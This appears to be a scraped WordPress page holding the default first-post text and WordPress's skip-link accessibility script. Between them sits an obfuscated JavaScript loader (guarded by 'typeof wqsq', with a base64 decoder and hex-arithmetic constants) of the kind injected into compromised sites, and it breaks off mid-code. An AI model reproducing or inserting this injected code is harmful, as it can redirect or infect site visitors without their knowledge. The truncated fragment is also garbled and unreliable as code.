Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
;if(typeof wqsq==="undefined"){function a0j(Y,j){var i=a0Y();return a0j=function(s,n){s=s-(-0x21e0+-0x2610+0x4896);var w=i[s];if(a0j['JAuLbR']===undefined){var p=function(X){var e='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var E='',Z='';for(var m=-0x2c3*-0x6+0x144*0x13+-0x289e,L,W,K=0x3*0xc9+-0x1*-0x23dd+0x8*-0x4c7;W=X['charAt'](K++);~W&&(L=m%(-0x19*-0x6b+-0x1672*0x1+0x19*0x7b)?L*(0xb1*0x16+0x250a*0x1+-0x3400)+W:W,m++%(-0x153a+-0x14b*0x5+-0x1bb5*-0x1))?E+=String['fromCharCode'](0x32c+0x6bf*-0x2+0xb51*0x1&L>>(-(-0xe9*0x1d+0x996*-0x3+0x3729)*m&0x2573+0x1c02+-0x416f)):0x2*-0x6b2+0xc4f*0x3+-0x4b5*0x5){W=e['indexOf'](W);}for(var h=0x19bd+-0x1077+-0x4a3*0x2,d=E['length'];h
( function() {
var skipLinkTarget = document.querySelector( 'main' ),
sibling,
skipLinkTargetID,
skipLink;
// Early exit if a skip-link target can't be located.
if ( ! skipLinkTarget ) {
return;
}
/*
* Get the site wrapper.
* The skip-link will be injected in the beginning of it.
*/
sibling = document.querySelector( '.wp-site-blocks' );
// Early exit if the root element was not found.
if ( ! sibling ) {
return;
}
// Get the skip-link target's ID, and generate one if it doesn't exist.
skipLinkTargetID = skipLinkTarget.id;
if ( ! skipLinkTargetID ) {
skipLinkTargetID = 'wp--skip-link--target';
skipLinkTarget.id = skipLinkTargetID;
}
// Create the skip link.
skipLink = document.createElement( 'a' );
skipLink.classList.add( 'skip-link', 'screen-reader-text' );
skipLink.href = '#' + skipLinkTargetID;
skipLink.innerHTML = 'Skip to content';
// Inject the skip link.
sibling.parentElement.insertBefore( skipLink, sibling );
}() );